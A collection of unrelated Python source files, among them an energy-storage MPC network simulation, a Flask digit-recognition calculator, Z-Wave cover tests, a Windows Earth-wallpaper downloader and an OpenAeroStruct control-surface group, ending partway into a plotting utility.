N_nondispatch = len(self.nondispatch_assets) #number of non-dispatchable assets
P_import_ems = np.zeros(self.T_ems)
P_export_ems = np.zeros(self.T_ems)
P_ES_ems = np.zeros([self.T_ems,N_ESs])
if ems_type == 'copper_plate':
P_demand_ems = np.zeros(self.T_ems)
else:
P_demand_ems = np.zeros([self.T_ems,N_nondispatch])
N_buses = self.network.N_buses
N_phases = self.network.N_phases
P_demand_buses = np.zeros([self.T,N_buses,N_phases])
Q_demand_buses = np.zeros([self.T,N_buses,N_phases])
PF_network_res = []
#######################################
### STEP 1: MPC Loop
#######################################
print('*** MPC SIMULATION START ***')
for t_mpc in range(self.T_ems):
print('************************')
print('MPC Interval '+ str(t_mpc)+ ' of '+ str(self.T_ems))
print('************************')
#######################################
### STEP 1.1: Optimisation
#######################################
if ems_type == 'copper_plate':
output_ems = self.EMS_copper_plate_t0_c1deg(t_mpc)
P_demand_ems[t_mpc] = output_ems['P_demand_val'][0]
else:
output_ems = self.EMS_3ph_linear_t0(t_mpc,
i_unconstrained_lines,
v_unconstrained_buses)
P_demand_ems[t_mpc,:] = output_ems['P_demand_val'][0,:]
P_import_ems[t_mpc] = output_ems['P_import_val'][0]
P_export_ems[t_mpc] = output_ems['P_export_val'][0]
P_ES_ems[t_mpc,:] = output_ems['P_ES_val'][0,:]
# convert P_EV signals to system time-series scale
T_interval = int(self.dt_ems/self.dt)
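# T_interval = simulation steps per EMS interval; the optimised set-point
# for interval t_mpc is held constant across them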
P_ESs = np.zeros([T_interval,N_ESs])
for t in range(T_interval):
P_ESs[t,:] = P_ES_ems[t_mpc,:]
#######################################
### STEP 1.2: update the controllable assets
#######################################
t0 = int(t_mpc*(self.dt_ems/self.dt))
# get the simulation time intervals within each EMS time interval
# and implement the ES system control for them
t_range = np.arange(t0,t0+T_interval)
for i in range(N_ESs):
for t_index in range(T_interval):
t = t_range[t_index]
self.storage_assets[i].update_control_t(P_ESs[t_index,i],t)
#######################################
### STEP 1.3: simulate the network
#######################################
# total real and reactive power demand at each bus phase
for t_index in range(T_interval):
t = t_range[t_index]
for i in range(N_ESs):
bus_id = self.storage_assets[i].bus_id
phases_i = self.storage_assets[i].phases
N_phases_i = np.size(phases_i)
for ph_i in phases_i:
P_demand_buses[t,bus_id,ph_i] +=\
self.storage_assets[i].Pnet[t]/N_phases_i
Q_demand_buses[t,bus_id,ph_i] +=\
self.storage_assets[i].Qnet[t]/N_phases_i
for i in range(N_nondispatch):
bus_id = self.nondispatch_assets[i].bus_id
phases_i = self.nondispatch_assets[i].phases
N_phases_i = np.size(phases_i)
for ph_i in np.nditer(phases_i):
P_demand_buses[t,bus_id,ph_i] +=\
self.nondispatch_assets[i].Pnet[t]/N_phases_i
Q_demand_buses[t,bus_id,ph_i] +=\
self.nondispatch_assets[i].Qnet[t]/N_phases_i
# set up a copy of the network for simulation interval t
network_t = copy.deepcopy(self.network)
network_t.clear_loads()
for bus_id in range(N_buses):
for ph_i in range(N_phases):
Pph_t = P_demand_buses[t,bus_id,ph_i]
Qph_t = Q_demand_buses[t,bus_id,ph_i]
#add P,Q loads to the network copy
network_t.set_load(bus_id,ph_i,Pph_t,Qph_t)
# run the power flow simulation
network_t.zbus_pf()
# store power flow results as a list of network objects
PF_network_res.append(network_t)
print('*** MPC SIMULATION COMPLETE ***')
return {'PF_network_res' :PF_network_res,\
'P_ES_ems':P_ES_ems,\
'P_import_ems':P_import_ems,\
'P_export_ems':P_export_ems,\
'P_demand_ems':P_demand_ems}
def simulate_network_3phPF_lean(self, ems_type = '3ph'):
"""
run the EMS in open loop and simulate a 3-phase AC network
"""
#######################################
### STEP 1: solve the optimisation
#######################################
t0 = 0
if ems_type == 'copper_plate':
# self.EMS_copper_plate()
output_ems = self.EMS_copper_plate_t0_c1deg(t0)
else:
# self.EMS_copper_plate()
output_ems = self.EMS_3ph_linear_t0(t0)
#output_ems = self.EMS_copper_plate
P_import_ems = output_ems['P_import_val']
P_export_ems = output_ems['P_export_val']
P_ES_ems = output_ems['P_ES_val']
P_demand_ems = output_ems['P_demand_val']
#convert P_EV signals to system time-series scale
N_ESs = len(self.storage_assets) #number of energy storage assets
N_nondispatch = len(self.nondispatch_assets) #number of non-dispatchable assets
P_ESs = np.zeros([self.T,N_ESs])
for t in range(self.T):
t_ems = int(t/(self.dt_ems/self.dt))
P_ESs[t,:] = P_ES_ems[t_ems,:]
#######################################
### STEP 2: update the controllable assets
#######################################
for i in range(N_ESs):
self.storage_assets[i].update_control(P_ESs[:,i])
#######################################
### STEP 3: simulate the network
#######################################
N_buses = self.network.N_buses
N_phases = self.network.N_phases
P_demand_buses = np.zeros([self.T,N_buses,N_phases])
Q_demand_buses = np.zeros([self.T,N_buses,N_phases])
#calculate the total real and reactive power demand at each bus phase
for i in range(N_ESs):
bus_id = self.storage_assets[i].bus_id
phases_i = self.storage_assets[i].phases
N_phases_i = np.size(phases_i)
for ph_i in np.nditer(phases_i):
P_demand_buses[:,bus_id,ph_i] += (self.storage_assets[i].Pnet
/ N_phases_i)
Q_demand_buses[:,bus_id,ph_i] += (self.storage_assets[i].Qnet
/ N_phases_i)
for i in range(N_nondispatch):
bus_id = self.nondispatch_assets[i].bus_id
phases_i = self.nondispatch_assets[i].phases
N_phases_i = np.size(phases_i)
for ph_i in np.nditer(phases_i):
P_demand_buses[:, bus_id, ph_i]\
+= (self.nondispatch_assets[i].Pnet / N_phases_i)
Q_demand_buses[:, bus_id, ph_i]\
+= (self.nondispatch_assets[i].Qnet / N_phases_i)
#Store power flow results as a list of network objects
PF_network_res = []
print('*** SIMULATING THE NETWORK ***')
for t in range(self.T):
#for each time interval:
#set up a copy of the network for simulation interval t
network_t = copy.deepcopy(self.network)
network_t.clear_loads()
for bus_id in range(N_buses):
for ph_i in range(N_phases):
Pph_t = P_demand_buses[t,bus_id,ph_i]
Qph_t = Q_demand_buses[t,bus_id,ph_i]
#add P,Q loads to the network copy
network_t.set_load(bus_id,ph_i,Pph_t,Qph_t)
#run the power flow simulation
network_t.zbus_pf()
if t % 1 == 0:
print('network sim complete for t = '
+ str(t) + ' of ' + str(self.T))
PF_network_res.append(network_t.res_bus_df)
print('*** NETWORK SIMULATION COMPLETE ***')
return {'PF_network_res' :PF_network_res,\
'P_ES_ems':P_ES_ems,\
'P_import_ems':P_import_ems,\
'P_export_ems':P_export_ems,\
'P_demand_ems':P_demand_ems}
# ---- new source file ----
import os
from flask import Flask, flash, redirect, render_template, request, session, abort, url_for, make_response, Response
import sys
import yaml
import os.path
import base64
from predict_digit import *
from matplotlib import image as mplimg
import cv2
import numpy as np
#from flask_json import FlaskJSON, JsonError, json_response, as_json
from flask_responses import json_response # flask.ext.* was removed in Flask 1.0; import the extension package directly
app = Flask(__name__)
#FlaskJSON(app)
number=list()
data=list()
def make_number():
global number
stng=''.join([str(i) for i in number])
num=int(stng)
number=list()
return num
def apply_padding(img, border, val):
h,w=img.shape
cols=np.ones((h,border))*val
tmp=np.concatenate([cols,img,cols],axis=1)
rows=np.ones((border, w+2*border))*val
res=np.concatenate([rows,tmp,rows])
return res
def argsort(lst):
return sorted(range(len(lst)), key=lst.__getitem__)
def extract_img(fname="digit_image.jpg"):
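# Segment the drawn digits: invert to white-on-black, find external
# contours, sort them left to right, pad each crop by 20 px, re-invert and
# save it as "<n>.jpg"; returns the bounding boxes and the digit count.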
im = cv2.imread(fname)
gray=cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)
gray=255-gray
cv2.imwrite("grayscale.png",gray)
image,contours,hierarchy= cv2.findContours(gray,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
idx=0
print("No of digits: ", len(contours))
gray2=cv2.imread("grayscale.png")
gray2=cv2.cvtColor(gray2, cv2.COLOR_BGR2GRAY)
c=[ (0,0,255), #red
(0,255,0), #green
(255,0,0),#blue
(255,255,255), #white
(128,128,128), #gray
(0,0,0)#black
]
total=len(contours)
pnt_idxs=argsort([(x,y) for cnt in contours for x,y,w,h in [cv2.boundingRect(cnt)]])
lst=list()
for index,ix in enumerate(pnt_idxs):
x,y,w,h = cv2.boundingRect(contours[ix])
lst.append((x,y,w,h))
idx += 1
#x,y,w,h = cv2.boundingRect(cnt)
roi=gray2[y:y+h,x:x+w]
#cv2.imwrite("tmp.jpg", roi)
#cv2.copyMakeBorder(roi, new_img, borderz, borderz, borderz, borderz, cv2.BORDER_CONSTANT, 255)
new_img=apply_padding(roi, 20, 0)
new_img=255-new_img
cv2.imwrite(str(idx)+".jpg", new_img)
#cv2.rectangle(im,(x,y),(x+20,y+20),c[index],2)
#cv2.imwrite("annotated.jpg", im)
#print("Lst :",lst)
return lst,total
exp=None
@app.route("/", methods=["GET","POST"])
def root():
return render_template("root.html")
def xtract_number():
indices,count=extract_img()
#print("Count: ",count)
ans=list()
for i in range(1,count+1):
ans.append(predict_drawn_img(str(i)+".jpg")[0])
number=int(''.join([str(i) for i in ans]))
#print("Ans: ", ans)
#print(indices)
return number
def is_number(dat):
try:
int(dat)
except:
return False
return True
@app.route("/operator", methods=["GET","POST"])
def operators():
global data
ans=0.0
op=request.json["operator"]
if op=="reset":
data=list()
return json_response({"num":"Draw the number above", "res":0.0}, status_code=200)
elif op=="backspace":
if len(data):
data=data[:-1]
exp=' '.join([str(i) for i in data])
return json_response({"num":exp, "res":ans}, status_code=200)
if data and is_number(data[-1]):
if op=='=':
exp=' '.join([str(i) for i in data+['=']])
ans=solve()
return json_response({"num":exp, "res":ans}, status_code=200)
elif op in ['+', '-', '*','/']:
data.append(op)
exp=' '.join([str(i) for i in data])
return json_response({"num":exp, "res":ans}, status_code=200)
with open("digit_image.jpg",'wb')as f:
f.write(base64.b64decode(request.json["image"].split(',')[1]))
number=xtract_number()
data.append(number)
data.append(op)
exp=' '.join([str(i) for i in data])
if op=='=':
data=data[:-1]
ans=solve()
return json_response({"num":exp, "res":ans}, status_code=200)
def solve():
global data
print(data)
total=data[0]
for index in range(1,len(data),2):
op=data[index]
if op=='+':
total+=data[index+1]
elif op=='-':
total-=data[index+1]
elif op=='*':
total*=data[index+1]
elif op=='/':
total/=data[index+1]
data=list()
print("Total= ", total)
return total
if __name__ == "__main__":
app.secret_key = os.urandom(12)
app.run(debug=False, host='0.0.0.0', port=31456)
# ---- new source file: dHannasch/python-packaging-test-bed ----
import setuptools
import os.path
import sphinx.setup_command
# To build the documentation: python setup.py build_sphinx
# To install this package: $ pip install --requirement ./requirements.txt --editable .
# To run the tests: $ python setup.py test or pytest
projectName = 'my-hyphenated-package'
packageData = dict()
packageData[projectName] = ['data/*.json']
versionString = '0.1'
minorVersionString = '0.1.0'
def getREADMEforDescription(readmePath=os.path.join(os.path.abspath(os.path.dirname(__file__)), 'README.md')):
"""Use the Markdown from the file for the package's long_description.
long_description_content_type should be 'text/markdown' in this case.
This is why we need the README to be in the MANIFEST.in file.
"""
try:
with open(readmePath) as readme:
return '\n' + readme.read()
except FileNotFoundError:
return 'Package for fuzzing.'
if __name__ == '__main__':
setuptools.setup(name=projectName,
version=versionString,
description='Package description.',
long_description=getREADMEforDescription(),
long_description_content_type='text/markdown',
license='MIT',
cmdclass={'build_sphinx': sphinx.setup_command.BuildDoc},
command_options={
'build_sphinx': {
'project': ('setup.py', projectName),
'version': ('setup.py', versionString),
'release': ('setup.py', minorVersionString),
'source_dir': ('setup.py', os.path.join('doc', 'source'))}},
packages=setuptools.find_packages(),
package_data=packageData,
install_requires=[
],
setup_requires=[
'pytest-runner',
],
tests_require=['pytest'],
zip_safe=True)
# ---- new source file ----
import os
from aztk.models.plugins.plugin_configuration import PluginConfiguration, PluginPort, PluginTargetRole
from aztk.models.plugins.plugin_file import PluginFile
dir_path = os.path.dirname(os.path.realpath(__file__))
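# Aztk plugin that proxies the Spark master web UI (localhost:8080) to
# public port 9999 on the master node, using the bundled
# spark_ui_proxy.sh / spark_ui_proxy.py scripts.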
class SparkUIProxyPlugin(PluginConfiguration):
def __init__(self):
super().__init__(
name="spark_ui_proxy",
ports=[PluginPort(internal=9999, public=True)],
target_role=PluginTargetRole.Master,
execute="spark_ui_proxy.sh",
args=["localhost:8080", "9999"],
files=[
PluginFile("spark_ui_proxy.sh", os.path.join(dir_path, "spark_ui_proxy.sh")),
PluginFile("spark_ui_proxy.py", os.path.join(dir_path, "spark_ui_proxy.py")),
],
)
# ---- new source file: tests/components/ozw/test_cover.py ----
"""Test Z-Wave Covers."""
from openpeerpower.components.cover import ATTR_CURRENT_POSITION
from openpeerpower.components.ozw.cover import VALUE_SELECTED_ID
from .common import setup_ozw
VALUE_ID = "Value"
async def test_cover(opp, cover_data, sent_messages, cover_msg):
"""Test setting up config entry."""
receive_message = await setup_ozw(opp, fixture=cover_data)
# Test loaded
state = opp.states.get("cover.roller_shutter_3_instance_1_level")
assert state is not None
assert state.state == "closed"
assert state.attributes[ATTR_CURRENT_POSITION] == 0
# Test setting position
await opp.services.async_call(
"cover",
"set_cover_position",
{"entity_id": "cover.roller_shutter_3_instance_1_level", "position": 50},
blocking=True,
)
assert len(sent_messages) == 1
msg = sent_messages[0]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": 50, "ValueIDKey": 625573905}
# Feedback on state
cover_msg.decode()
cover_msg.payload["Value"] = 50
cover_msg.encode()
receive_message(cover_msg)
await opp.async_block_till_done()
# Test opening
await opp.services.async_call(
"cover",
"open_cover",
{"entity_id": "cover.roller_shutter_3_instance_1_level"},
blocking=True,
)
assert len(sent_messages) == 2
msg = sent_messages[1]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": True, "ValueIDKey": 281475602284568}
# Test stopping after opening
await opp.services.async_call(
"cover",
"stop_cover",
{"entity_id": "cover.roller_shutter_3_instance_1_level"},
blocking=True,
)
assert len(sent_messages) == 4
msg = sent_messages[2]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": False, "ValueIDKey": 281475602284568}
msg = sent_messages[3]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": False, "ValueIDKey": 562950578995224}
# Test closing
await opp.services.async_call(
"cover",
"close_cover",
{"entity_id": "cover.roller_shutter_3_instance_1_level"},
blocking=True,
)
assert len(sent_messages) == 5
msg = sent_messages[4]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": True, "ValueIDKey": 562950578995224}
# Test stopping after closing
await opp.services.async_call(
"cover",
"stop_cover",
{"entity_id": "cover.roller_shutter_3_instance_1_level"},
blocking=True,
)
assert len(sent_messages) == 7
msg = sent_messages[5]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": False, "ValueIDKey": 281475602284568}
msg = sent_messages[6]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": False, "ValueIDKey": 562950578995224}
# Test stopping after no open/close
await opp.services.async_call(
"cover",
"stop_cover",
{"entity_id": "cover.roller_shutter_3_instance_1_level"},
blocking=True,
)
# both stop open/close messages sent
assert len(sent_messages) == 9
msg = sent_messages[7]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": False, "ValueIDKey": 281475602284568}
msg = sent_messages[8]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": False, "ValueIDKey": 562950578995224}
# Test converting position to zwave range for position > 0
await opp.services.async_call(
"cover",
"set_cover_position",
{"entity_id": "cover.roller_shutter_3_instance_1_level", "position": 100},
blocking=True,
)
assert len(sent_messages) == 10
msg = sent_messages[9]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": 99, "ValueIDKey": 625573905}
# Test converting position to zwave range for position = 0
await opp.services.async_call(
"cover",
"set_cover_position",
{"entity_id": "cover.roller_shutter_3_instance_1_level", "position": 0},
blocking=True,
)
assert len(sent_messages) == 11
msg = sent_messages[10]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": 0, "ValueIDKey": 625573905}
async def test_barrier(opp, cover_gdo_data, sent_messages, cover_gdo_msg):
"""Test setting up config entry."""
receive_message = await setup_ozw(opp, fixture=cover_gdo_data)
# Test loaded
state = opp.states.get("cover.gd00z_4_barrier_state")
assert state is not None
assert state.state == "closed"
# Test opening
await opp.services.async_call(
"cover",
"open_cover",
{"entity_id": "cover.gd00z_4_barrier_state"},
blocking=True,
)
assert len(sent_messages) == 1
msg = sent_messages[0]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": 4, "ValueIDKey": 281475083239444}
# Feedback on state
cover_gdo_msg.decode()
cover_gdo_msg.payload[VALUE_ID][VALUE_SELECTED_ID] = 4
cover_gdo_msg.encode()
receive_message(cover_gdo_msg)
await opp.async_block_till_done()
state = opp.states.get("cover.gd00z_4_barrier_state")
assert state is not None
assert state.state == "open"
# Test closing
await opp.services.async_call(
"cover",
"close_cover",
{"entity_id": "cover.gd00z_4_barrier_state"},
blocking=True,
)
assert len(sent_messages) == 2
msg = sent_messages[1]
assert msg["topic"] == "OpenZWave/1/command/setvalue/"
assert msg["payload"] == {"Value": 0, "ValueIDKey": 281475083239444}
# ---- new source file: Soulter/SoEarth---a-real-time-Earth-Wallpaper/main.py ----
# -*- coding:UTF-8 -*-
from PIL import Image,ImageFont,ImageDraw
import requests
import urllib
import urllib.request
import win32api,win32con,win32gui
import json
import os
import time,datetime,threading
from tkinter import Button,Tk,PhotoImage,Label,Text
import tkinter.messagebox
#http://himawari8-dl.nict.go.jp/himawari8/img/D531106/1d/550/2019/01/05/131000_0_0.png
# TIMEDATA_URL = "http://himawari8-dl.nict.go.jp/himawari8/img/D531106/latest.json" THE PAGE IS NOT AVAILABLE
TIMEDATA_URL = "https://himawari8.nict.go.jp/img/FULL_24h/latest.json"
# EARTH_URL = "http://himawari8-dl.nict.go.jp/himawari8/img/D531106/1d/550/{}/{}/{}/{}_0_0.png"
EARTH_URL = "https://himawari8.nict.go.jp/img/D531106/1d/550/{}/{}/{}/{}_0_0.png"
WTER_URL = "http://api.yytianqi.com/observe?city=CH010100&key=mu1lfn6pa8nibus8"
HITOKOTO_URL = "https://v1.hitokoto.cn"
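# TIMEDATA_URL / EARTH_URL: Himawari-8 satellite image service (latest
# capture timestamp and a 550 px full-disk tile); WTER_URL: yytianqi
# weather API for current conditions; HITOKOTO_URL: random quote API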
tag = 0
get_earth_tag = 0
latest_earth_file_path = ""
def text_display(strs):
text1.insert(1.0,strs+"\n")
top.update()
def read_url(url_ok):
"""
Fetch the page at url_ok and decode it as UTF-8.
"""
web_html = ""
try :
web_html=urllib.request.urlopen(url_ok).read().decode('utf-8')
except BaseException:
text_display("error: reading url: "+url_ok)
return web_html
def get_json(html):
"""
Parse the fetched text into a JSON object.
"""
web_json = {}
try :
web_json=json.loads(html)
except BaseException:
text_display("error: parsing to json: "+html)
return web_json
def url_provider(timedata,earthurl):
earth_time = timedata.get("date")
print(earth_time)
year = earth_time[0:4]
month = earth_time[5:7]
day = earth_time[8:10]
hms = str(earth_time[11:13]+earth_time[14:16]+earth_time[17:19])
time_name = year+month+day+hms
url = earthurl.format(year,month,day,hms)
return url,time_name
def img_get(img_url,time_name):
img = requests.get(img_url)
f = open(time_name+".png",'ab')
f.write(img.content)
f.close()
print("保存Pic:"+time_name+".png")
return img
def img_edit(img,time_name,timedata,wterdata,hitokoto_json):
# Create a background image matching the desktop resolution, then composite the Earth image onto it
screenX = win32api.GetSystemMetrics(win32con.SM_CXSCREEN)
screenY = win32api.GetSystemMetrics(win32con.SM_CYSCREEN)
    bg_img = Image.new('RGBA', (screenX,screenY), (0,0,0,255))  # create the wallpaper background
    earth_img = Image.open(time_name+".png")  # open the downloaded Earth image
    bg_img.paste(earth_img,(screenX//2-550//2,screenY//2-550//2))  # center the Earth image on the background
logo = Image.open('logo.png')
bg_img.paste(logo,(screenX-250,screenY//2))
    # Time conversion: add 8 hours to get UTC+8 (China Standard Time)
    # Convert the time string into a datetime object
chinaTime = datetime.datetime.strptime(timedata.get('date'), '%Y-%m-%d %H:%M:%S')
    # Convert the datetime to a Unix timestamp, then add eight hours (in seconds)
chinaTime = int(time.mktime(chinaTime.timetuple())) + 8 * 60 * 60
    # Convert the timestamp back to a datetime
chinaTime = datetime.datetime.fromtimestamp(chinaTime)
text_display("零时区的时间:"+timedata.get('date'))
text_display("东八区区时:"+str(chinaTime))
hitokoto_str = hitokoto_json.get("hitokoto") + " ——" + hitokoto_json.get("from")
fontFolder = r'C:\Windows\Fonts'
# fontFolder = r'\\'
blackFont1 = ImageFont.truetype(os.path.join(fontFolder, 'msyh.ttc'), size=20)
blackFont2 = ImageFont.truetype(os.path.join(fontFolder, 'msyh.ttc'), size=90)
blackFont3 = ImageFont.truetype(os.path.join(fontFolder, 'msyh.ttc'), size=30)
blackFont80 = ImageFont.truetype(os.path.join(fontFolder, 'msyh.ttc'), size=80)
# blackFont1 = ImageFont.truetype(os.path.join(fontFolder, 'DENGGB.TTF'), size=20)
# blackFont2 = ImageFont.truetype(os.path.join(fontFolder, 'DENGGB.TTF'), size=90)
# blackFont3 = ImageFont.truetype(os.path.join(fontFolder, 'DENGGB.TTF'), size=30)
# blackFont80 = ImageFont.truetype(os.path.join(fontFolder, 'DENGGB.TTF'), size=80)
tx_time = ImageDraw.Draw(bg_img)
tx_time.text((screenX-250+12,screenY//2+55), str(chinaTime), fill='white', font=blackFont1)
try :
tx_wter_qw = ImageDraw.Draw(bg_img)
tx_wter_du = ImageDraw.Draw(bg_img)
tx_wter_tq = ImageDraw.Draw(bg_img)
tx_wter_ct = ImageDraw.Draw(bg_img)
wter_qw = str(wterdata.get('data').get('qw'))
tx_hitokoto = ImageDraw.Draw(bg_img)
# wter_tq = int(str(wterdata.get('data').get('numtq')))
# print(wter_tq)
#
# if wter_tq == 2:
# tqlogo = Image.open('02.png')
# bg_img.paste(tqlogo, (screenX - 500, screenY // 2))
        # At font size 90 the optimal spacing is 65 px, hence the position arithmetic in the lines below
# tx_wter_qw.text((screenX - 250 + 12, screenY -650), wter_qw, fill='white', font=blackFont2)
# tx_wter_du.text((screenX - 250 + len(wter_qw)*65, screenY - 630), "°", fill='white',font=blackFont3)
# tx_wter_tq.text((screenX - 250 + len(wter_qw)*65, screenY - 587), str(wterdata.get('data').get('tq')), fill='white', font=blackFont3)
# tx_wter_ct.text((screenX - 250 + 16, screenY - 540), "桂林市", fill='white', font=blackFont1)
tx_wter_qw.text((screenX * 0.84 , screenY * 0.2), wter_qw, fill='white', font=blackFont2)
tx_wter_du.text((screenX * 0.92, screenY * 0.22), "°", fill='white', font=blackFont3)
tx_wter_tq.text((screenX * 0.92, screenY * 0.313), str(wterdata.get('data').get('tq')),
fill='white', font=blackFont3)
tx_wter_ct.text((screenX * 0.843, screenY * 0.323), "北京市", fill='white', font=blackFont1)
tx_hitokoto.text((screenX * 0.5 - 10*len(hitokoto_str), screenY * 0.08), hitokoto_str, fill='white', font=blackFont1)
except AttributeError:
text_display("获取天气集合失败,也许是没Money了...")
bg_img.save('bg_img.bmp')
def wallpaperSet():
k = win32api.RegOpenKeyEx(win32con.HKEY_CURRENT_USER, "Control Panel\\Desktop", 0, win32con.KEY_SET_VALUE)
win32api.RegSetValueEx(k, "WallpaperStyle", 0, win32con.REG_SZ, "2")
win32api.RegSetValueEx(k, "TileWallpaper", 0, win32con.REG_SZ, "0")
    win32gui.SystemParametersInfo(win32con.SPI_SETDESKWALLPAPER, os.getcwd() + r'\bg_img.bmp',1 + 2)  # os.getcwd() returns the current working directory
def startCallBack():
global tag
tag = 0
t = threading.Thread(target=starting, name='StartingThread')
    t.daemon = True  # idiomatic replacement for the deprecated setDaemon(True)
t.start()
def endCallBack():
global tag
tag = 1
tkinter.messagebox.showinfo("操作状态", "执行成功!")
def infoCallBack():
tkinter.messagebox.showinfo("关于...", "地球日记 By:Soulter \n QQ:905617992 \n如何设置自启动? 将本程序放入Windows的'启动'文件夹中" )
def diyBtnCallBack():
diySettingsWindow = Tk()
l1 = tkinter.Label(diySettingsWindow, text='目标网址(目前仅支持json)', bg='green', width=30, height=2)
apiInput = tkinter.Entry(diySettingsWindow)
l2 = tkinter.Label(diySettingsWindow, text='更新频率(毫秒ms)', bg='green', width=30, height=2)
ctimeInput = tkinter.Entry(diySettingsWindow)
l3 = tkinter.Label(diySettingsWindow, text='坐标x', bg='green', width=30, height=2)
posxInput = tkinter.Entry(diySettingsWindow)
l4 = tkinter.Label(diySettingsWindow, text='坐标y', bg='green', width=30, height=2)
posyInput = tkinter.Entry(diySettingsWindow)
l5 = tkinter.Label(diySettingsWindow, text='键', bg='green', width=30, height=2)
target_arg = tkinter.Entry(diySettingsWindow)
# btn = Button(diySettingsWindow, text="确定", command=lambda: dsw_set_diy_style(apiInput.get(), ctimeInput.get(), posxInput.get(), posyInput.get(), target_arg.get()))
l1.pack()
apiInput.pack()
l2.pack()
ctimeInput.pack()
l3.pack()
posxInput.pack()
l4.pack()
posyInput.pack()
l5.pack()
target_arg.pack()
# btn.pack()
diySettingsWindow.mainloop()
def dsw_parsingApiCallback(url):
html = read_url(url)
print(html)
def starting():
while 1:
global tag
if tag == 1:
print("STOP...")
break
text_display(
"-------------------------\n作者:Soulter QQ:905617992\ngithub.com/soulter\n-------------------------")
timedata_html = read_url(TIMEDATA_URL)
timedata_json = get_json(timedata_html)
wterdata_html = read_url(WTER_URL)
wterdata_json = get_json(wterdata_html)
hitokoto_html = read_url(HITOKOTO_URL)
hitokoto_json = get_json(hitokoto_html)
text_display("得到时间数据文件:" + str(timedata_json))
text_display("得到文件city=25.266443,110.157113 天气:" + str(wterdata_json))
# global get_earth_tag
url, time_name = url_provider(timedata_json, EARTH_URL)
# latest_earth_file_path = time_name
img = img_get(url, time_name)
img_edit(img, time_name, timedata_json, wterdata_json, hitokoto_json)
get_earth_tag = 0
# Set Windows Wallpaper
wallpaperSet()
text_display("sleep5分钟-v-!!!")
time.sleep(5 * 60)
top = Tk()
get_earth_tag = 0
text1 = Text(top,width=50,height=20)
text1.insert(1.0, "Waiting your order:)")
text1.pack()
top.title("地球日记 | EarthDiary")
top.iconbitmap('mainlogo.ico')
B = Button(top, text ="运行", command=startCallBack)
B2 = Button(top, text ="停止", command=endCallBack)
B3 = Button(top, text ="关于作者...", command=infoCallBack)
# textInput = tkinter.Entry(top)
diyBtn = Button(top, text= "个性化(beta)", command=diyBtnCallBack)
# photo=PhotoImage(file="guibg.gif")
# label=Label(top,image=photo) #图片
# label.pack()
B.pack()
B2.pack()
B3.pack()
# textInput.pack()
diyBtn.pack()
top.mainloop()
| StarcoderdataPython |
136261 | <gh_stars>0
import itertools
import openmdao.api as om
from openaerostruct.aerodynamics.control_surfaces import ControlSurface
def _pairwise(iterable): # From itertools recipes
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
a, b = itertools.tee(iterable)
next(b, None)
return zip(a, b)
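# A minimal sketch of what _pairwise yields (illustrative values only):
#   list(_pairwise([0, 2, 4, 6, 8])) -> [(0, 2), (2, 4), (4, 6), (6, 8)]
# This is exactly how the spanwise index pairs ('yLoc') of the ailerons are
# built in the __main__ block below.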
class ControlSurfacesGroup(om.Group):
""" A collection of control surfaces generated from a list of dictionaries"""
def initialize(self):
self.options.declare('control_surfaces', types=list)
self.options.declare('mesh')
def setup(self):
control_surfaces = self.options['control_surfaces']
# Add control surfaces as subsystems
for control_surface in control_surfaces:
control_surface_component = ControlSurface(mesh=self.options['mesh'], **control_surface)
self.add_subsystem(control_surface['name'], control_surface_component)
# Connect control surfaces
self.promotes(control_surfaces[0]['name'], inputs=['undeflected_normals'])
for surf1, surf2 in _pairwise(control_surfaces):
self.connect(surf1['name']+'.deflected_normals',
surf2['name']+'.undeflected_normals')
self.promotes(control_surfaces[-1]['name'], outputs=['deflected_normals'])
# Promote def_mesh for all surfaces
for surf in control_surfaces:
self.promotes(surf['name'], inputs=['def_mesh'])
if __name__ =='__main__':
import numpy as np
from openaerostruct.geometry.utils import generate_mesh
# Based on NACA TN2563
# Brief description
S = 2*0.092903
AR = 8
b = np.sqrt(S*AR)
taper = 0.45
rc = 2*S/(b*(taper+1))
tc = rc*taper
sweep = 46 # from LE
cg_loc = np.array([0.38*rc,0,0])
# Testing conditions
alpha = 0.012 # From Kirsten Wind Tunnel page
rho = 1.2
n = 4
num_y = n*(10)+1
num_x = 7
# Create a dictionary to store options about the surface
mesh_dict = {'num_y' : num_y,
'num_x' : num_x,
'wing_type' : 'rect',
'symmetry' : False,
'span' : b,
'root_chord' : rc}
mesh = generate_mesh(mesh_dict)
control_surfaces = [
{
'name': 'ail0'+str(ind[1]),
'yLoc': list(ind),
'cLoc': [0.7, 0.7], #All ailerons are 0.3c
'antisymmetric': True,
'corrector': True
} for ind in _pairwise([0, 2, 4, 6, 8])]
csg = ControlSurfacesGroup(control_surfaces=control_surfaces, mesh=mesh)
p = om.Problem()
p.model.add_subsystem('control_surfaces', csg)
p.setup()
p.final_setup()
| StarcoderdataPython |
4838599 | <reponame>ihsuy/Train-by-Reconnect<filename>train_by_reconnect/viz_utils.py<gh_stars>1-10
import textwrap
import math
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.patches import ConnectionPatch
def Profiler(model, nrows=None, ncols=None, skip_1d=True, path=None, wrapwidth=30):
"""Plot weight profiles for trainable_variables of model.
Args:
model - (tensorflow.keras.Sequential) - the model to be plotted.
nrows - (int) - number of rows
ncols - (int) - number of columns
        skip_1d - (boolean) - whether to skip trainable variables
            whose number of dimensions equals 1, e.g., biases.
path - (str) - save plotted image to path.
wrapwidth - (int) - width for textwrap.wrap.
"""
w = [var.numpy() for var in model.trainable_variables]
names = [var.name for var in model.trainable_variables]
